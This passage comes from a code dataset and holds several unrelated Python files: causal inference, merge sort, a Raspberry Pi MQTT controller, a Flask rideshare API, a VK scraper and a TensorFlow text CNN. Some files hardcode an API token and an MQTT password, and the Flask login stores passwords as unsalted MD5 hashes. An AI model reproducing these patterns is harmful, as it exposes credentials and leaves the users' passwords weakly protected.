range(am.shape[0])]\r\n if (matrix_type == \"am\"):\r\n am.to_csv(method + \"_\" + t + str(1) + \"\\\\\" + data_type + \"_adjacent_matrix_\" + str(k) + \".csv\")\r\n elif (matrix_type == \"p\"):\r\n am.to_csv(method + \"_\" + t + str(1) +\"\\\\\" + data_type + \"_p_\" + str(k) + \".csv\")\r\n\r\ndef matrix2array(m):\r\n a = []\r\n for i in range(m.shape[0]):\r\n for j in range(m.shape[1]):\r\n if(i != j):\r\n a.append(m.ix[i, j])\r\n return a\r\n\r\ndef threshold(prior_am, est_am):\r\n label = matrix2array(prior_am)\r\n prob = matrix2array(est_am)\r\n return roc_auc_score(label, prob)\r\n\r\ndef func(par):\r\n k = par[\"k\"]\r\n path = par[\"path\"]\r\n os.chdir(path)\r\n\r\n aa = pd.read_table(\"AA_\" + str(k) + \".txt\", index_col=0).T\r\n ra = pd.read_table(\"RA_\" + str(k) + \".txt\", index_col=0).T\r\n\r\n for t in [\"sparcc\"]:\r\n for data_type in [ \"AA\"]:#\"RA\",\r\n start_time = time.time()\r\n am_prior = BuildAM(par, t, data_type)\r\n print(am_prior)\r\n if (data_type == \"AA\"):\r\n am, p = main(aa, am_prior)\r\n elif (data_type == \"RA\"):\r\n am, p = main(ra, am_prior)\r\n StandardOutput(am, t, method=\"DoWhy\", k=k, data_type=data_type, matrix_type=\"am\", path=path)\r\n StandardOutput(p, t, method=\"DoWhy\", k=k, data_type=data_type, matrix_type=\"p\", path=path)\r\n print(\"running time is \" + str(time.time() - start_time))\r\n\r\nif __name__ == \"__main__\":\r\n pool = mp.Pool(processes=30)\r\n for k in range(1, 101):\r\n for i in [\"gLV\", \"hubbell\", \"soi\"]:\r\n if(i == \"gLV\"):\r\n s = [\"CS\"]#,\"TS\", \"TS_dense\"\r\n else:\r\n s = [\"CS\"]#,\"TS\"\r\n for j in s:\r\n path = \"C:\\\\Users\\\\Administrator\\\\Desktop\\\\causal_compare\\\\data_e\\\\\" + i + \"_\" + j\r\n par = {\r\n \"i\": i,\r\n \"j\": j,\r\n \"k\": k,\r\n \"path\": path\r\n }\r\n #func(par)\r\n pool.apply_async(func, (par,))\r\n pool.close()\r\n pool.join()","sub_path":"code/3_inference/dowhy/init_temp.py","file_name":"init_temp.py","file_ext":"py","file_size_in_byte":8234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"195330973","text":"def mergeSort(A, p, r):\n '''Merge-sort\n A: The array to be sorted.\n p: The starting index.\n r: The ending index.'''\n\n if r > p:\n q = (p + r) // 2\n mergeSort(A, p, q)\n mergeSort(A, q+1, r)\n merge(A, p, q, r)\n\n\ndef merge(A, p, q, r):\n L = A[p:q+1]\n R = A[q+1:r+1]\n L.append(float('inf'))\n R.append(float('inf'))\n i, j = 0, 0\n for k in range(p, r+1):\n if L[i] <= R[j]:\n A[k] = L[i]\n i = i + 1\n else:\n A[k] = R[j]\n j = j + 1\n\n\nimport random\n\nif __name__ == '__main__':\n arr1 = [1,5,2,7,3,4,6,9,0,8]\n arr2 = [-2,-3,0,1,3,2,-1]\n arr3 = [1,1,2,2,0,0,-1,-2,-3]\n\n mergeSort(arr1, 0, len(arr1)-1)\n mergeSort(arr2, 0, len(arr2)-1)\n mergeSort(arr3, 0, len(arr3)-1)\n print(arr1)\n print(arr2)\n print(arr3)\n\n arr_rand = [random.choice(list(range(-9,10))) for i in range(10)]\n\n print(\"before:\", arr_rand)\n mergeSort(arr_rand, 0, len(arr_rand)-1)\n print(\"sorted:\", arr_rand)\n","sub_path":"ch2/2.3/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"472890315","text":"class SimplePlayer:\n def __init__(self):\n self.loc = None\n self.board = None\n self.directions = [(1, 0), (0, 1), (-1, 0), (0, -1)]\n\n def set_game_params(self, board):\n self.board = board\n for i, row in enumerate(board):\n for j, val in enumerate(row):\n if val == 1:\n self.loc = (i, j)\n break\n\n def state_score(self, board, loc):\n num_steps_available = 0\n for d in self.directions:\n i = loc[0] + d[0]\n j = loc[1] + d[1]\n if 0 <= i < len(board) and 0 <= j < len(board[0]) and board[i][j] == 0: # then move is legal\n num_steps_available += 1\n\n if num_steps_available == 0:\n return -1\n else:\n return 4 - num_steps_available\n\n def count_ones(self, board):\n counter = 0\n for i, row in enumerate(board):\n for j, val in enumerate(row):\n if val == 1:\n counter += 1\n return counter\n\n def make_move(self, time): # time parameter is not used, we assume we have enough time.\n\n assert self.count_ones(self.board) == 1\n\n prev_loc = self.loc\n self.board[prev_loc] = -1\n\n assert self.count_ones(self.board) == 0\n\n best_move, best_move_score, best_new_loc = None, float('-inf'), None\n for d in self.directions:\n i = self.loc[0] + d[0]\n j = self.loc[1] + d[1]\n\n if 0 <= i < len(self.board) and 0 <= j < len(self.board[0]) and self.board[i][j] == 0: # then move is legal\n new_loc = (i, j)\n # print('prev loc', prev_loc, 'new_loc:', new_loc, 'move:', (i, j))\n assert self.board[new_loc] == 0\n self.board[new_loc] = 1\n assert self.count_ones(self.board) == 1\n\n score = self.state_score(board=self.board, loc=(i, j))\n if score > best_move_score:\n best_move, best_move_score, best_new_loc = d, score, new_loc\n self.board[new_loc] = 0\n assert self.count_ones(self.board) == 0\n\n\n if best_move is None:\n # print(self.board)\n exit()\n\n self.board[best_new_loc] = 1\n\n assert self.count_ones(self.board) == 1\n\n self.loc = best_new_loc\n # print('returning move', best_move)\n return best_move\n\n def set_rival_move(self, loc):\n self.board[loc] = -1\n","sub_path":"SimplePlayer.py","file_name":"SimplePlayer.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"449468564","text":"import RPi.GPIO as GPIO # Import Raspberry Pi GPIO library\nGPIO.setwarnings(False) # Ignore warning for now\nGPIO.setmode(GPIO.BCM)\nimport paho.mqtt.client as mqtt\nimport logging\nimport time\n\nimport buttons\nimport sunscreens\n\nclass NoRunningFilter(logging.Filter):\n def filter(self, record):\n return False\n\ndef init():\n global logger\n\n my_filter = NoRunningFilter()\n logging.getLogger(\"apscheduler.scheduler\").addFilter(my_filter)\n logging.getLogger(\"apscheduler.executors.default\").addFilter(my_filter)\n \n logging.basicConfig(filename='/home/pi/share/pr/hahoau/headless/logging.log',level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(__name__)\n logger.info('Start')\n buttons.init()\n sunscreens.init()\n \ndef exit():\n buttons.exit()\n sunscreens.exit()\n logger.info('Stop\\n\\n\\n')\n\ndef on_message(client, userdata, message):\n print(\"message received \" ,str(message.payload.decode(\"utf-8\")))\n print(\"message topic=\",message.topic)\n print(\"message qos=\",message.qos)\n print(\"message retain flag=\",message.retain)\n sunscreens.control(4, str(message.payload.decode(\"utf-8\")), 100) \n\ninit()\n\n#client =mqtt.Client(\"pi_device\")\n#client.on_message=on_message #attach function to callback\n#client.username_pw_set(\"esp32\", \"hH809814\")\n#client.connect(\"hassio.local\")\n#client.subscribe(\"homeassistant/pi/no1/sunscreen4\")\n#client.loop_start() #start the loop\n\nwhile True:\n time.sleep(0.3)\n\n#message = raw_input(\"Press enter to quit\\n\\n\") # Run until someone presses enter\nexit()\nGPIO.cleanup() # Clean up\n#client.loop_stop() #stop the loop\n","sub_path":"headless/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"561799842","text":"import pymysql\nfrom sauron.metrics import Metric, MetricException\n\n\nclass SphinxMetric(Metric):\n def __init__(self, name, host='127.0.0.1', port=9306, **kwargs):\n Metric.__init__(self, name, **kwargs)\n self.reconfig(name, host, port)\n\n def reconfig(self, name, host='127.0.0.1', port=9306, **kwargs):\n Metric.reconfig(self, name, **kwargs)\n self.host = host\n self.port = port\n self.conn = None\n self.cur = None\n\n def __del__(self):\n try:\n self.cur.close()\n self.conn.close()\n except AttributeError:\n pass\n\n def values(self):\n try:\n self.conn = pymysql.connect(host=self.host, port=self.port)\n self.cur = self.conn.cursor()\n self.cur.execute('show status')\n r = dict(self.cur.fetchall())\n return {\n 'results' : {\n 'uptime' : (r['uptime'], 'Seconds'),\n 'queries' : (r['queries'], 'Count'),\n 'avg_wall' : (r['avg_query_wall'], 'Seconds'),\n 'avg_cpu' : (r['avg_query_cpu'], 'Percent'),\n 'avg_read' : (r['avg_query_readkb'], 'Kilobytes')\n }\n }\n except pymysql.err.MySQLError:\n raise MetricException('Error connecting to sphinx searchd')\n except KeyError:\n raise MetricException('Could not find all keys in searchd status')\n","sub_path":"sauron/metrics/SphinxMetric.py","file_name":"SphinxMetric.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"355614046","text":"from action_broker.shared.oas_clients import card_broker_client\nfrom hamcrest import assert_that, equal_to\ndef send_acquire_card_request(game_id=None, card_id=None, player_id=None):\n \"\"\"\n fetches game card list from card service based on game_id\n \"\"\"\n _, result = card_broker_client.cardOperations.acquire_card(\n acquireCardRequest={\n 'playerId': player_id,\n 'cardId': card_id,\n 'gameId': game_id\n }\n ).result()\n assert_that(result.status_code, equal_to(200))\n\n return True\n\ndef confirm_card_supply(game_id=None, card_id=None):\n \"\"\"\n fetch supply of a given card\n \"\"\"\n supply, result = card_broker_client.gameInfo.check_card_supply(\n gameId=game_id,\n cardId=card_id\n ).result()\n assert_that(result.status_code, equal_to(200))\n\n return (supply['supply'] > 0)\n\ndef send_draw_card_request(player_id):\n _, result = card_broker_client.cardOperations.draw_player_card(\n playerId=player_id\n ).result()\n assert_that(result.status_code, equal_to(200))\n\ndef send_curse_players_request(cursing_player=None, game_id=None):\n _, result = card_broker_client.cardOperations.curse_players(\n cursePlayersRequest={\n 'gameId': game_id,\n 'cursingPlayerId': cursing_player\n }\n ).result()\n assert_that(result.status_code, equal_to(200))\n","sub_path":"action_broker/shared/card_broker_calls.py","file_name":"card_broker_calls.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"351842907","text":"from flask import Flask, jsonify, request, json, Response, render_template\nfrom flask_cors import CORS\nfrom flask_mysqldb import MySQL\nfrom flask import abort\nfrom datetime import datetime\nfrom flask_bcrypt import Bcrypt\nfrom flask_jwt_extended import JWTManager\nfrom flask_jwt_extended import create_access_token\n\nimport Seat_Geek_API as SGE\nfrom Database_Layer.dbController import DBController\nimport DB_config, hashlib\n\napp = Flask(__name__)\n\n# CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\nCORS(\n app\n) # Need this to allow requests between client and server for Cross-origin resource sharing\napp.config[\"MYSQL_HOST\"] = DB_config.MYSQL_HOST\napp.config[\"MYSQL_USER\"] = DB_config.MYSQL_USER\napp.config[\"MYSQL_PASSWORD\"] = DB_config.MYSQL_PASSWORD\napp.config[\"MYSQL_DB\"] = DB_config.MYSQL_DB\napp.config[\"CORS_HEADERS\"] = DB_config.CORS_HEADERS\napp.config[\"MYSQL_CURSORCLASS\"] = DB_config.MYSQL_CURSORCLASS\napp.config[\"JWT_SECRET_KEY\"] = DB_config.JWT_SECRET_KEY\nmysql = MySQL(app)\nbcrypt = Bcrypt(app)\njwt = JWTManager(app)\n\n\n@app.route(\n \"/index\", methods=[\"GET\"]\n) # handles route of home page in backend send required data to react\ndef index():\n events = SGE.Seat_Geek_Api()\n print()\n if request.args:\n filterValue = ((request.args.get(\"filterValue\")).split(\"%20\"))[0]\n searchValue = request.args.get(\"searchValue\")\n print(\"filterValue is\", filterValue, \"searchValue is\", searchValue)\n if filterValue == \"City\":\n eventsdata = events.getByVenue(searchValue)\n elif filterValue == \"Date\":\n eventsdata = events.getByDate(searchValue)\n elif filterValue == \"Performer\":\n eventsdata = events.getByPerformer(searchValue.replace(\" \", \"-\"))\n elif filterValue == \"No Filter\" and searchValue != \"\":\n eventsdata = events.getByQuery(searchValue.replace(\" \", \"+\"))\n else:\n eventsdata = events.getallEvents()\n\n else:\n print(\"No filter arguments found\")\n eventsdata = events.getallEvents()\n return eventsdata\n\n\n@app.route(\"/getusers/\", methods=[\"GET\"])\ndef getUsers(userid):\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n response = controller.getUser(userid)\n\n print(\"db op\", response)\n return response\n\n\n@app.route(\n \"/event/\", methods=[\"GET\"]\n) # handles route of Event page in backend send required data to react\ndef event(eventId):\n event = SGE.Seat_Geek_Api()\n eventdata = event.getEvent(eventId)\n return eventdata\n\n\n@app.route(\"/signup\", methods=[\"POST\"]) # handles route of signup page\ndef signup():\n try:\n if request.method == \"POST\":\n print(\"Signup is hit!!\")\n data = request.get_json(silent=True)\n print(\"Received data is\", request.get_json())\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n response = controller.enterUser(data)\n\n if response == \"Success\":\n returnData = {\"response\": response}\n print(\"Sending resposne\", returnData)\n return returnData\n elif response == \"Email already present. Try a new email-id\":\n returnData = {\"response\": response}\n print(\"Sending resposne\", returnData)\n return {\"response\": response}\n else:\n print(\"error is:\", response)\n (abort(500, {\"response\": response}))\n\n except Exception as e:\n print(\"error:\", e)\n return e\n\n\n@app.route(\"/offerRide\", methods=[\"GET\", \"POST\"]) # handles route of signup page\ndef offerRide():\n try:\n if request.method == \"POST\":\n\n data = request.get_json(silent=True)\n print(\"Received offer ride data is\", request.get_json())\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n response = controller.saveOfferRide(data)\n if response == \"Success\":\n returnData = {\"response\": response}\n print(\"Sending resposne\", returnData)\n return returnData\n else:\n print(\"error is:\", response)\n (abort(500, {\"response\": response}))\n\n except Exception as e:\n print(\"error:\", e)\n return e\n\n\n@app.route(\"/saveRequest\", methods=[\"GET\", \"POST\"])\ndef save_request():\n data = request.get_json(silent=True)\n RideID = data.get(\"rideId\")\n eventID = data.get(\"eventId\")\n userID = data.get(\"userId\")\n status = \"pending\"\n # print(RideID, eventID, userID, status)\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n # controller.saveRequest(\"124\", \"1\", \"ageldartp\", \"pending\")\n controller.saveRequest(RideID, eventID, userID, status)\n Response = app.response_class()\n return Response\n\n\n@app.route(\"/users/modifyRequest\", methods=[\"POST\"])\ndef modifyRequest():\n data = request.get_json(silent=True)\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n if data[\"status\"] in [\"accepted\", \"declined\"]:\n result = controller.updateRequest(data[\"requestId\"], data[\"status\"])\n if result == data[\"status\"]:\n return result\n else:\n response = json.loads(\n json.dumps(\n {\"status\": \"error\", \"message\": \"Error while modifying request\"}\n )\n )\n (abort(500, {\"response\": response}))\n else:\n response = json.loads(\n json.dumps({\"status\": \"error\", \"message\": \"Invalid status. Please check\"})\n )\n (abort(500, {\"response\": response}))\n\n\n@app.route(\n \"/event/rides/\", methods=[\"GET\"]\n) # handles route of Event page in backend send required data to react\ndef rides(eventId):\n # eventId = 4704993 # hardcoded as we have data for this few events only\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n print(\"user id is: \", request.args.get(\"userId\"))\n if \"userId\" in request.args and (\n request.args.get(\"userId\") not in [\"\", \"None\", \"undefined\"]\n ): # condition to check if userId is sent in request\n response = controller.getrides_username(\n eventId, request.args.get(\"userId\")\n ) # sending offered rides data without his own rides\n else:\n response = controller.getrides_wo_username(\n eventId\n ) # sending all offered rides data for any given event\n return response\n\n\n@app.route(\"/users/login\", methods=[\"POST\"])\ndef login():\n # cur = mysql.connection.cursor()\n email = request.get_json()['email']\n password = request.get_json()['password'].encode('utf-8')\n # result = \"\"\n\n cursor = mysql.connection.cursor()\n connection = mysql.connection\n controller = DBController(cursor, connection)\n rv = controller.Userlogin(email,password)\n\n # cur.execute(\"SELECT * FROM USER where email_id = '\" + str(email) + \"'\")\n # rv = cur.fetchone()\n print(rv)\n if rv['PASSWORD'] == (hashlib.md5(password)).hexdigest(): #hashing password and validating\n result = create_access_token(identity = {'first_name': rv['FIRST_NAME'],'last_name': rv['LAST_NAME'],'username': rv['USERNAME'],'email': rv['EMAIL_ID']})\n else:\n result = jsonify({\"error\":\"Invalid username and password\"})\n \n return result\n\n\n\nif __name__ == \"__main__\":\n app.run(host=\"localhost\", debug=True, port=5000)\n","sub_path":"server/src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":7759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"358812737","text":"import requests\nimport pandas as pd\nfrom datetime import datetime\nimport time\n\ndef main_vk_request_wall(id_group, count_posts, filter):\n\n data = get_request_wall(id_group, count_posts, filter)\n data_posts = data['data']\n max_count_posts = data['max_count_posts']\n stats = processing_data_vk_posts(data_posts)\n vk_excel_url = data_to_excel(stats, id_group)\n\n return {'vk_excel_url': vk_excel_url, 'max_count_posts': max_count_posts}\n\n\n\n\ndef get_request_wall(id_group, count_posts, filter):\n token = 'af567951af567951af5679518caf3e98dfaaf56af567951f3270969be965f073f20981f'\n offset = 0\n count = 100\n data_posts = []\n max_count_posts = 0\n\n while offset < count_posts:\n\n url = 'https://api.vk.com/method/wall.get'\n params = {\n 'domain': id_group,\n 'filter': filter,\n 'count': count,\n 'offset': offset,\n 'access_token': token,\n 'v': 5.73\n }\n\n r = requests.get(url, params=params).json()\n\n check = True\n if check:\n max_count_posts = r['response']['count']\n if max_count_posts < count_posts:\n count_posts = max_count_posts\n check = False\n else:\n check = False\n\n data_posts += r['response']['items']\n offset += count\n time.sleep(0.5)\n\n return {'data': data_posts, 'max_count_posts': max_count_posts}\n\n\ndef processing_data_vk_posts(data_posts):\n stats = []\n\n for record in data_posts:\n title = record['text'].split('\\n')[0] # название поста берем символы до первого переноса\n if len(title) > 80: # я взял первые 80 символов из названия поста\n title = title[:80]\n\n len_title = len(record['text']) # вытаскиваем длинну текста\n len_title = len_title // 100 * 100 # для удобства групировки по кол-ву символов разбил на промежутки по 100, тоесть если длинна текста 200 это значит , что символов от 200 до 300\n\n date = datetime.fromtimestamp(record['date']).strftime('%Y-%m-%d') # вытаскиваем дату в формате ГГГГ-ММ-ДД\n hour = datetime.fromtimestamp(record['date']).strftime('%H') # вытаскиваем час\n\n attachment = {'photo': 0, 'audio': 0, 'video': 0, 'link': 0,\n 'poll': 0} # список из типов вложений. Я использовал самые популярные , если у вас другие типы вложений вы можете добавить их в список. Взять можно отсюда https://vk.com/dev/objects/attachments_w\n\n if 'attachments' in record: # цикл для подсчета типов и кол-ва вложений\n for attach in record['attachments']:\n if attach['type'] in attachment:\n attachment[attach['type']] = attachment[attach['type']] + 1\n\n if 'views' in record:\n views = record['views']['count']\n else:\n views = 0\n\n total_actions = record['comments']['count'] + record['likes']['count'] + record['reposts'][\n 'count'] # сумируем все активности\n\n # создаем список и добавляем в него название, длину, кол-во фото, кол-во аудио, кол-во видео в постах, постов с сылками, пстов с опросами, просмотры, кол-во просмотров, комментариев, лайков, репостов, сумму всех взаимодействий, дату и час\n stats.append(\n [title, len_title, attachment['photo'], attachment['audio'], attachment['video'], attachment['link'],\n attachment['poll'], views, record['comments']['count'], record['likes']['count'],\n record['reposts']['count'], total_actions, date, hour])\n\n return stats\n\ndef data_to_excel(stats, id_group):\n # Создаем DataFrame (таблицу) из данных и записываем\n columns = [\"name_post\", 'len_text', 'photo', 'audio', 'video', 'link', 'poll', \"views\", \"comments\", \"likes\",\n \"share\", 'total_action', \"date\", \"hour\"] # задаем заголовки таблицы\n df = pd.DataFrame(data=stats, columns=columns)\n\n # групировка таблиц по часам и удаление не нужных столбцов\n df_hour = df.drop(['len_text', 'photo', 'audio', 'video', 'link', 'poll'], axis=1)\n df_group_by_hour = df_hour.groupby('hour').sum() # группируем значения по часу\n df_group_by_hour['count_post'] = df_hour.groupby('hour')[\n 'name_post'].count() # считаем колличесво постов вышедших в данный час\n df_group_by_hour['mean_action'] = df_group_by_hour['total_action'] / df_group_by_hour[\n 'count_post'] # считаем среднее значение активности (все активности / кол-во активностей)\n df_group_by_hour['views_on_post'] = df_group_by_hour['views'] / df_group_by_hour['count_post']\n df_group_by_hour['er'] = df_group_by_hour['total_action'] / df_group_by_hour[\n 'views'] * 100 # считаем ER (все активности / кол-во просмотров * 100)\n df_group_by_hour = df_group_by_hour.sort_values(by=\"er\", ascending=False) # сортируем по ER\n\n # групировка таблиц по типам и удаление не нужных столбцов\n df_type = df.drop(['date', 'hour'], axis=1)\n df_group_by_len_title = df_type.groupby('len_text').sum()\n df_group_by_len_title['count_posts'] = df_type.groupby('len_text')['name_post'].count()\n df_group_by_len_title['mean_action'] = df_group_by_len_title['total_action'] / df_group_by_len_title['count_posts']\n df_group_by_len_title['views_on_post'] = df_group_by_len_title['views'] / df_group_by_len_title['count_posts']\n df_group_by_len_title['er'] = df_group_by_len_title['total_action'] / df_group_by_len_title['views'] * 100\n df_group_by_len_title = df_group_by_len_title.sort_values(by='views', ascending=False)\n df_group_by_len_title = df_group_by_len_title.style.format(\"{:.2f}\")\n\n # запись в excel файл\n record_url_xlsx = 'static/data_vk_{}.xlsx'.format(id_group)\n with pd.ExcelWriter(record_url_xlsx) as writer:\n df.to_excel(writer, index=False, sheet_name='Исходный DataFrame')\n df_group_by_hour.to_excel(writer, index=True, sheet_name='Групировка по часу')\n df_group_by_len_title.to_excel(writer, index=True, sheet_name='Гр��пировка по кол-ву символов')\n for atach in ['photo', 'audio', 'video', 'link', 'poll']:\n df_group_by_temp = df_type.groupby(atach).sum()\n df_group_by_temp = df_group_by_temp.loc[:, [\"views\", \"comments\", \"likes\", \"share\", 'total_action']]\n df_group_by_temp['count_posts'] = df_type.groupby(atach)['name_post'].count()\n df_group_by_temp['mean_action'] = df_group_by_temp['total_action'] / df_group_by_temp['count_posts']\n df_group_by_temp['views_on_post'] = df_group_by_temp['views'] / df_group_by_temp['count_posts']\n df_group_by_temp['er'] = df_group_by_temp['total_action'] / df_group_by_temp['views'] * 100\n df_group_by_temp = df_group_by_temp.sort_values(by='er', ascending=False)\n df_group_by_temp = df_group_by_temp.style.format(\"{:.2f}\")\n sheet_name = 'Групировка по ' + atach\n df_group_by_temp.to_excel(writer, index=True, sheet_name=sheet_name)\n\n return record_url_xlsx","sub_path":"vk_create_request/vk_wall_get.py","file_name":"vk_wall_get.py","file_ext":"py","file_size_in_byte":7986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"362797514","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\n# dfs solution\nclass Solution:\n \"\"\"\n @param: root: A Tree\n @return: Inorder in ArrayList which contains node values.\n \"\"\"\n\n def inorderTraversal(self, root):\n # write your code here\n self.result = []\n self.helper(root)\n return self.result\n\n # @return: None\n def helper(self, root):\n if root is None:\n return\n\n self.helper(root.left)\n self.result.append(root.val)\n self.helper(root.right)\n\n# iterative solution !!\nclass Solution:\n \"\"\"\n @param: root: A Tree\n @return: Inorder in ArrayList which contains node values.\n \"\"\"\n\n def inorderTraversal(self, root):\n # write your code here\n stack = []\n result = []\n cur = root\n while cur or stack:\n # push all left into stack\n while cur:\n stack.append(cur)\n cur = cur.left\n\n # push left out, add it to result\n cur = stack.pop()\n result.append(cur.val)\n\n # push the node's right into stack\n cur = cur.right\n\n return result\n","sub_path":"lintcode/树/67-binary-tree-inorder-traversal.py","file_name":"67-binary-tree-inorder-traversal.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"384115590","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport os\n\n\nclass TextCNN():\n def __init__(self, dataset, filter_numbers, sentence_length,lstm_n_hidden, lstm_n_layer, cnn_layer_size_list,\n learn_rate, epochs, batch_size, dropout_pro):\n tf.reset_default_graph()\n\n '''\n 0. init variable\n '''\n self.name = str(filter_numbers) + '_' + str(lstm_n_hidden) + '+' + str(cnn_layer_size_list) + '+' + str(\n learn_rate) + '_' + str(batch_size) + '_' + str(dropout_pro) + '+++'\n self.name = self.name.replace('[', '').replace(']', '')\n self.learning_rate = learn_rate\n self.epochs = epochs\n self.seq_length = sentence_length\n self.filter_numbers = filter_numbers\n self.batch_size = batch_size\n self.dropout_pro_item = dropout_pro\n self.embedding_dim = len(dataset.zh_embedding_matrix[0])\n self.zh_vocab_size = len(dataset.zh_embedding_matrix)\n self.en_vocab_size = len(dataset.en_embedding_matrix)\n self.lstm_n_hidden = lstm_n_hidden\n self.lstm_n_layer = lstm_n_layer\n self.cnn_layer_size = cnn_layer_size_list\n\n self.dataset = dataset\n self.keep_prob = tf.placeholder(tf.float32)\n\n '''\n 1. input layer\n '''\n #\n self.input_zh = tf.placeholder(tf.int32, shape=[None, sentence_length])\n self.input_pos = tf.placeholder(tf.int32, shape=[None, sentence_length])\n self.input_neg = tf.placeholder(tf.int32, shape=[None, sentence_length])\n\n # self.input_en_image = tf.placeholder()\n\n self.zh_seq_len = tf.placeholder(tf.int32, shape=[None])\n self.pos_seq_len = tf.placeholder(tf.int32, shape=[None])\n self.neg_seq_len = tf.placeholder(tf.int32, shape=[None])\n\n self.zh_dict_vec = tf.placeholder(shape=[self.zh_vocab_size, self.embedding_dim],\n dtype=tf.float32)\n self.en_dict_vec = tf.placeholder(shape=[self.en_vocab_size, self.embedding_dim],\n dtype=tf.float32)\n\n '''\n 2. embedding layer\n '''\n with tf.name_scope('embedding_layer'):\n embeddings_zh = tf.nn.embedding_lookup(self.zh_dict_vec, self.input_zh)\n embeddings_pos = tf.nn.embedding_lookup(self.en_dict_vec, self.input_pos)\n embeddings_neg = tf.nn.embedding_lookup(self.en_dict_vec, self.input_neg)\n\n '''\n 3. use BiLSTM to zh and pos/neg \n hiddens = [batch_size, seq_length, n_hiddens]\n '''\n # zh forward and backward lstm\n zh_lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(num_units=lstm_n_hidden, forget_bias=1.0)\n zh_lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(num_units=lstm_n_hidden, forget_bias=1.0)\n\n # en(pos/neg) backward layer\n en_lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(num_units=lstm_n_hidden, forget_bias=1.0)\n en_lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(num_units=lstm_n_hidden, forget_bias=1.0)\n\n with tf.variable_scope(\"zh_bilstm\", reuse=None) as scope:\n hiddens_zh, state_zh = tf.nn.bidirectional_dynamic_rnn(cell_fw=zh_lstm_fw_cell,\n cell_bw=zh_lstm_bw_cell,\n inputs=embeddings_zh,\n sequence_length=self.zh_seq_len,\n dtype=tf.float32)\n hiddens_zh = tf.concat(hiddens_zh, axis=2)\n\n with tf.variable_scope(\"en_bilstm\", reuse=None) as scope:\n hiddens_pos, state_pos = tf.nn.bidirectional_dynamic_rnn(cell_fw=en_lstm_fw_cell,\n cell_bw=en_lstm_bw_cell,\n inputs=embeddings_pos,\n sequence_length=self.pos_seq_len,\n dtype=tf.float32)\n hiddens_pos = tf.concat(hiddens_pos, axis=2)\n\n with tf.variable_scope(\"en_bilstm\", reuse=True) as scope:\n hiddens_neg, state_neg = tf.nn.bidirectional_dynamic_rnn(cell_fw=en_lstm_fw_cell,\n cell_bw=en_lstm_bw_cell,\n inputs=embeddings_neg,\n sequence_length=self.neg_seq_len,\n dtype=tf.float32)\n\n hiddens_neg = tf.concat(hiddens_neg, axis=2)\n\n '''\n 4. concat zh outputs and pos/neg outputs\n '''\n self.pos_concat = tf.concat([hiddens_zh, hiddens_pos], -1)\n self.neg_concat = tf.concat([hiddens_zh, hiddens_neg], -1)\n self.pos_concat = tf.expand_dims(self.pos_concat, -1)\n self.neg_concat = tf.expand_dims(self.neg_concat, -1)\n\n '''\n 5. conv layer + maxpool layer for each filer size\n '''\n pool_layer_list_pos = []\n pool_layer_list_neg = []\n W_list = []\n b_list = []\n # convolutio layer\n for layer in cnn_layer_size_list:\n filter_shape = [layer, self.lstm_n_hidden * 4, 1, filter_numbers]\n W_list.append(tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filter_weight'))\n b_list.append(tf.Variable(tf.constant(0.1, shape=[filter_numbers]), name='filter_bias'))\n\n for W, b, filter_size in zip(W_list, b_list, cnn_layer_size_list):\n max_pool_layer_pos = self.__add_conv_layer(self.pos_concat, W, b, filter_size)\n pool_layer_list_pos.append(max_pool_layer_pos)\n max_pool_layer_neg = self.__add_conv_layer(self.neg_concat, W, b, filter_size)\n pool_layer_list_neg.append(max_pool_layer_neg)\n\n '''\n 6. full connect droput + softmax + l2\n '''\n # combine all the max pool —— feature\n with tf.name_scope('dropout_layer'):\n max_num = len(cnn_layer_size_list) * self.filter_numbers\n\n h_pool_pos = tf.concat(pool_layer_list_pos, name='last_pool_layer', axis=3)\n pool_layer_flat_pos = tf.reshape(h_pool_pos, [-1, max_num], name='pool_layer_flat')\n dropout_pro_layer_pos = tf.nn.dropout(pool_layer_flat_pos, self.keep_prob, name='dropout')\n\n h_pool_neg = tf.concat(pool_layer_list_neg, name='last_pool_layer', axis=3)\n pool_layer_flat_neg = tf.reshape(h_pool_neg, [-1, max_num], name='pool_layer_flat')\n dropout_pro_layer_neg = tf.nn.dropout(pool_layer_flat_neg, self.keep_prob, 